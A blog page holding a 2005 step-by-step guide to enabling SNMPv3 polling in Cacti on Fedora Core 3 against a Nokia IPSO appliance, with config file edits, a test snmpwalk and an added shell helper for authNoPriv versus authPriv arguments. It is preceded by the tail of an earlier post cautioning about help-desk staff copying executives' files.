Yes this is a little long winded, but if you’ve read it you’ll see how easy it actually was: download a hacker program, install it, type a couple of commands, and copy your victim’s files; now do you think this is beyond anyone on your IT department’s help-desk? Do you really think they should be copying files off the CEO’s laptop?

It is my hope that, with all the news hype and articles like this, people will follow basic security practices at home as well as at work, thus making a better Internet for us all! :cool:

Cacti. How to Enable SNMP v3 Polling.

Cacti SNMP v3 How-To (0.2)

Preface:

This document is intended to describe the process required to enable SNMPv3 polling within Cacti. It was written whilst performing the installation on a Linux Fedora Core 3 server, although implementations on Fedora Core 1 & White Box Enterprise Linux have also been successful. The host used to gather data from, for the purpose of this document, is a Nokia IPSO appliance. Note that the security level configured below, authNoPriv, authenticates each request and response with a keyed hash but does not encrypt them; for confidentiality you need authPriv, which additionally takes a privacy protocol and passphrase (net-snmp’s -x and -X).

Limitations:

The version of Cacti used will be 0.8.6b; “TheWitness” has told me that this version has a poller crash, but I’ve yet to try upgrading to 0.8.6c.

System Requirements:

Apache, php, mysql, snmp, rrd-tool, and cacti ;-)

Installation:

I’m going to assume that you’ve got to the point where all of the parts needed for the system requirements are working, Cacti is installed, and you’ve just logged in after step 8 of http://www.cacti.net/downloads/docs/html/install_unix.html and were about to create a device.
  1. Log out ;-)
    Before we can create any SNMPv3 devices we need to enable v3, and to do that we need to make some changes to the PHP files.
  2. Change: ~/cacti_install_dir/lib/snmp.php.txt
    Line 46:

    • Change: $version = "1";
    • to: $version = "3";

    Line 65:

    • Change: $snmp_auth = "-u $username -X $password"; /* v3 – username/password */
    • to: $snmp_auth = "-u $username -A $password"; /* v3 – username/password */

    Line 119:

    • Change: $snmp_auth = "-u $username -X $password"; /* v3 – username/password */
    • to: $snmp_auth = "-u $username -A $password"; /* v3 – username/password */

    (-X is net-snmp’s privacy passphrase, which an authNoPriv session never uses; -A is the authentication passphrase, so this is what makes the password from the device form the one the agent actually checks. The security level itself comes from /etc/snmp/snmp.conf, created in step 6. Also note that this puts the passphrase on the snmpwalk/snmpget command line, where ps shows it to every user on the Cacti box.)
  3. Change: ~/cacti_install_dir/include/config_form.php.txt
    Line 655:

    • Change: "method" => "hidden"
    • to: "method" => "textbox"

    Line 663:

    • Change: "method" => "hidden"
    • to: "method" => "textbox"
  4. Change: config_settings.php.txt
    Uncomment lines 186 to 199, i.e. remove the "//" from the beginning of each line.
  5. Change: config_array.php.txt
    Line 135:

    • Change:
      $snmp_versions = array(1 =>
      "Version 1",
      "Version 2");
    • To:
      $snmp_versions = array(1 =>
      "Version 1",
      "Version 2",
      "Version 3");
  6. Create /etc/snmp/snmp.conf
    This file is read by the net-snmp tools Cacti shells out to, and supplies the security level that the command line built above does not. The contents of the file should be:

    defContext ""
    defSecurityLevel authNoPriv

  7. Create Device
    As documented: http://www.cacti.net/downloads/docs/html/graph_howto.html#NEW_DEVICE
    (For Nokia IPSO appliances use the host template Generic SNMP-enabled
    Host, and Associated Data Queries: SNMP - Get Processor Information & SNMP -
    Interface Statistics)

    Screen Shot of creating a cacti device

  8. Create Graph

Appendix:

  • Rpms on my FC3 Machine
    $SHELL>rpm -qa | grep mysql
    mysql-3.23.58-14
    php-mysql-4.3.10-3.2
    mysql-server-3.23.58-14
    mysql-devel-3.23.58-14
    libdbi-dbd-mysql-0.6.5-9
    
    $SHELL> rpm -qa | grep php
    php-ldap-4.3.10-3.2
    php-mysql-4.3.10-3.2
    php-odbc-4.3.10-3.2
    php-4.3.10-3.2
    php-pear-4.3.10-3.2
    
    $SHELL> rpm -qa | grep http
    httpd-suexec-2.0.52-3.1
    system-config-httpd-1.3.1-1
    httpd-2.0.52-3.1
    httpd-manual-2.0.52-3.1
    
    $SHELL> rpm -qa | grep rrd
    rrdtool-1.0.49-3
    
    $SHELL> rpm -qa | grep snmp
    net-snmp-libs-5.1.2-11
    net-snmp-5.1.2-11
    net-snmp-utils-5.1.2-11
    
  • How to set up SNMPv3 on IPSO
    (This is a quick guide to the steps needed)

    1. Log into Voyager
    2. Click Config
    3. Below the heading “Security and Access Configuration” click Users
    4. Add a new user (username, uid {e.g. 110}, home {e.g. /var/uid}), click Apply
    5. Set the new user’s password, click Apply
    6. Click Home, Config, SNMP
    7. At the bottom of the page set the user to read-write (Cacti only ever reads, so if the page offers read-only, that is all the polling account needs)

    To test from the Cacti server, try from a shell: snmpwalk -u user -A password <host>; the security level comes from the /etc/snmp/snmp.conf created earlier, and net-snmp uses version 3 when -v is omitted unless snmp.conf says otherwise.
    You should get….

    $SHELL>snmpwalk -u user -A password default_gw
    SNMPv2-MIB::sysDescr.0 = STRING: IP650 rev AAA06449-411, IPSO xxx 3.7.1-BUILD004 releng 1227 11.06.2003-010000 i386
    SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.94.1.21.2.1.8
    SNMPv2-MIB::sysUpTime.0 = Timeticks: (382157315) 44 days, 5:32:53.15
    SNMPv2-MIB::sysContact.0 = STRING: Me
    SNMPv2-MIB::sysName.0 = STRING: Nokia
    SNMPv2-MIB::sysLocation.0 = STRING: Here
    SNMPv2-MIB::sysServices.0 = INTEGER: 76
    SNMPv2-MIB::sysORLastChange.0 = Timeticks: (16) 0:00:00.16
    SNMPv2-MIB::sysORID.1 = OID: SNMPv2-MIB::snmpMIB

    SNMPv2-MIB::sysORID.2 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
    SNMPv2-MIB::sysORID.3 = OID: SNMP-MPD-MIB::snmpMPDCompliance
    SNMPv2-MIB::sysORID.4 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
    …….

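To make the difference between the authNoPriv setup above and an actually encrypted session concrete, here is an added example (my own, not from the how-to) that builds the net-snmp argument list for either security level and refuses the passphrases USM will not accept (shorter than 8 characters). The protocol choices SHA and AES are assumptions, overridable with SNMP_AUTH_PROTO / SNMP_PRIV_PROTO for agents that only speak MD5/DES; the user name and passphrases are made up.

```sh
#!/bin/sh
# Added example, not from the original how-to: build the net-snmp argument list
# for the two SNMPv3 security levels, to make explicit the difference between
# what the how-to configures (authNoPriv: every PDU authenticated with a keyed
# hash, but readable on the wire) and authPriv (authenticated and encrypted).
# Flags are net-snmp's: -l level, -u user, -a MD5|SHA -A authpass, -x DES|AES -X privpass.
# USM passphrases must be at least 8 characters, so shorter ones are refused.
# Protocols default to SHA/AES (assumed); set SNMP_AUTH_PROTO / SNMP_PRIV_PROTO
# if the agent only supports MD5/DES.

snmpv3_args() {   # snmpv3_args LEVEL USER AUTHPASS [PRIVPASS]
    level=$1 user=$2 apass=$3 ppass=$4
    aproto=${SNMP_AUTH_PROTO:-SHA} pproto=${SNMP_PRIV_PROTO:-AES}
    if [ -z "$user" ] || [ ${#apass} -lt 8 ]; then
        echo "need a user and an auth passphrase of 8+ characters" >&2; return 1
    fi
    case "$level" in
        authNoPriv)
            printf '%s\n' "-v 3 -l authNoPriv -u $user -a $aproto -A $apass" ;;
        authPriv)
            if [ ${#ppass} -lt 8 ]; then
                echo "authPriv needs a priv passphrase of 8+ characters" >&2; return 1
            fi
            printf '%s\n' "-v 3 -l authPriv -u $user -a $aproto -A $apass -x $pproto -X $ppass" ;;
        *)
            echo "unsupported security level: $level (use authNoPriv or authPriv)" >&2; return 1 ;;
    esac
}

# What the how-to's test command amounts to, and its encrypted equivalent
# (user name and passphrases are made up):
snmpv3_args authNoPriv cacti 'correct-horse'
snmpv3_args authPriv   cacti 'correct-horse' 'battery-staple'
# e.g. snmpwalk $(snmpv3_args authPriv cacti 'correct-horse' 'battery-staple') default_gw
```

Either way the passphrases end up on the command line; net-snmp will instead read defSecurityName, defAuthType, defAuthPassphrase, defPrivType and defPrivPassphrase from a snmp.conf, so for a poller put them in a ~/.snmp/snmp.conf readable only by the user Cacti runs as, and keep /etc/snmp/snmp.conf for the non-secret defaults.
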
    ChangeLog

    1. 16/3/2005 : [NICK] Doc Complete
    2. 17/3/2005 : [NICK] Doc Published on http://forums.cacti.net/
    3. 30/3/2005: [NICK] Doc moved into WordPress to allow viewers to comment directly

    END

    And I think that’s all folks, I hope it works for you & that you find this of some use !.